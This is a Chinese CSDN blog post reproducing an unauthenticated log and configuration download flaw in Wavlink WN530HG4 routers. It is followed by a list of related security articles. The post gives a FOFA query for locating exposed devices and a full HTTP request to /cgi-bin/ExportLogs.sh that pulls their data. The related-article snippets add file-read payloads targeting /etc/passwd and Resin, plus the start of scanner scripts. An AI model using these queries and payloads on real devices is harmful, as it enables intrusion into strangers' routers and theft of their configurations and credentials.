Wavlink导出日志配置未授权访问下载(含批量验证poc)

已于 2024-04-06 21:47:42 修改
阅读量48 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-06 21:47:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137439316
版权
本文详细介绍了Wavlink WN530HG4 M30HG4.V5030.191116版本存在的一个安全漏洞,该漏洞允许任何未经身份验证的用户下载日志和配置信息。通过特定的fofa搜索语法和Payload,可以复现此问题。
摘要由CSDN通过智能技术生成

1.漏洞介绍

Wavlink WN530HG4 M30HG4.V5030.191116 中的访问控制问题允许未经身份验证的攻击者下载日志文件和配置数据。

2.影响版本

Wavlink WN530HG4 M30HG4.V5030.191116

3.漏洞复现

fofa语法:

title="Wi-Fi APP Login"

Payload:

GET /cgi-bin/ExportLogs.sh HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: */*
Referer: http://x.x.x.x/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
专栏目录
订阅专栏
CVE-2014-0085 zookeeper授权访问POCsuite自动化脚本
afei001
07-27 737
这是基于POCsuite的zookeeper授权访问POCsuite自动化脚本。
【漏洞复现】斐讯FIR151M路由器授权下载漏洞
晚风不及你
02-07 663
斐讯数据通信技术有限公司成立于2009年,是为用户提供智慧家庭领域智能产品和云服务的科技创新性企业。
授权下载导致的信息泄露
weixin_53884648的博客
04-18 469
常见漏洞发掘之授权访问下载
安全设备授权访问+任意文件下载0day
angaoux03775的博客
08-22 290
具体是哪家就不说了,硬件盒子,主要检测病毒。 payload如下: https://xxx.xxx.xxx.xxx/downTxtFile.php?filename=/etc/passwd 比较简单,当时有获取报告的功能,自己传入的物理路径,可以授权访问直接下载设备上的文件。 转载于:https://www.cnblogs.com/sevck/p/1139309...
ZooKeeper通过ACL修复授权访问漏洞
05-06
ZooKeeper通过ACL修复授权访问漏洞,此文档适合学习
Wavlink路由器远程命令执行漏洞(批量验证poc
weixin_43567873的博客
04-04 78
Wavlink路由器远程命令执行漏洞(批量验证poc
wavlink:wavlink办公网站,网址为thinkphp5.1.39
03-27
Wavlink官方网站 WAVLINK品牌是立足中国,放眼全球的一个超新品牌,并且苦心经营数十载。官方网站采用thinkPHP为框架,严格遵守PSR-2 \ PSR-3等规范,代码严谨,几乎捕捉到所有的异常信息,对用户输入采用严格验证,...
睿因(Wavlink) WL-WN575A3 固件 -A-RPTA3-75W.M4300.01.GD.2017Nov22
10-15
睿因(Wavlink)WL-WN575A3是一款高性能的无线路由器,这款设备的固件更新是保持其高效稳定运行的关键。固件,全称为"Firmware",是嵌入在硬件设备中的软件部分,它控制着设备的各项功能,包括网络连接、安全设置、...
K2 中继 5G WiFi 最稳的固件Wavlink固件
11-01
K2 中继 5G WiFi 最稳的固件(Wavlink固件
授权访问漏洞总结
hackerie的博客
12-28 1万+
目前主要存在授权访问漏洞的有:NFS服务,Samba服务,LDAP,Rsync,FTP,GitLab,Jenkins,MongoDB,Redis,ZooKeeper, ElasticSearch,Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo等, 本文主要介绍一些目前比较常用的一些服务的授权访问,欢迎大家补充! 参考:https://www.secpu
授权访问漏洞
crystal_shrimps的博客
07-07 4624
一、resin 1 任意文件读取 默认下Resin的/webapps目录下/resin-doc中包有一个扩展war文件,远程攻击者可能利用此漏洞读取Web主目录下的任意文件,包括JSP源码或类文件。 payload # viewfile任意文件读取 http://localhost/resin-doc/viewfile/?file=index.jsp # jndi-appconfig inputFile任意文件读取/SSRF http://localhost/resin-doc/resource/tut
无胁科技-TVD每日漏洞情报-2022-8-2
wuthreat无胁科技的博客
08-02 997
参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?漏洞编号CVE-2022-34047;漏洞编号CVE-2022-25369。...
漏洞预警:CVE-2021-45232 Apache APISIX Dashboard 授权访问(附批量扫描POC
热门推荐
weixin_43526443的博客
12-29 7万+
目录 Part1 漏洞描述 Part2 风险等级 Part3 漏洞影响 Part4 漏洞分析 4.1 漏洞源码 4.2 漏洞验证 4.3 POC Part5 修复建议 Part1 漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关,Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。 在2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架gin和drople
授权漏洞批量扫描poc
qq_45300786的博客
08-15 2256
一般来说我们检验是否存在漏洞,都是一个个的检验。但是如果遇到了目标有很多,这个怎么办呢? 这里提供2个思路 一、msf的扫描 找到 1.1、指定文件ip扫描 192.168.100.222 192.168.100.223 192.168.100.224 192.168.100.225 192.168.100.226 这样一行一行写入文本 1.2、指定网络段ip扫描 一般都是扫C段,也就是/24就行了,尽量不要去搞A(8)、B段(16),太多了 二、楼主这里提供一些批量poc import socket
mongodb授权访问脚本
Matthew
09-11 7620
有事候知识整合起来会发生很大的威力,尝试着写了一个poc来测试mongodb的授权访问漏洞,发现危害还是很大的。 把脚本放在https://github.com/Xyntax/POC-T,框架的script目录下面。脚本仅供学习: #!/usr/bin/python # -*- coding: UTF-8 -*- """ moogodb授权访问 Usage: python POC-
Redis授权访问漏洞验证脚本编写(POC)
Mrs_H的博客
04-11 1504
Redis授权访问漏洞验证脚本编写(POC) 1.实验环境: Ubuntu18(靶机) kali linux(攻击机) 2.代码的编写: import sys import getopt import socket def url_exec(url):#将要探测的主机地址都存入一个待测数组内 ans = [] group = [] li = url.split(".") if (url.find('-') == -1): group.append(url
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
09-14 2199
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
wavlink 路由器 live_api 远程命令执行漏洞
01-01
wavlink路由器live_api存在远程命令执行漏洞。该漏洞允许攻击者通过远程发送恶意请求的方式来执行任意命令,从而获取敏感信息或者对系统造成破坏。攻击者可利用此漏洞进行网络入侵、窃取数据或者进行其他恶意活动。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值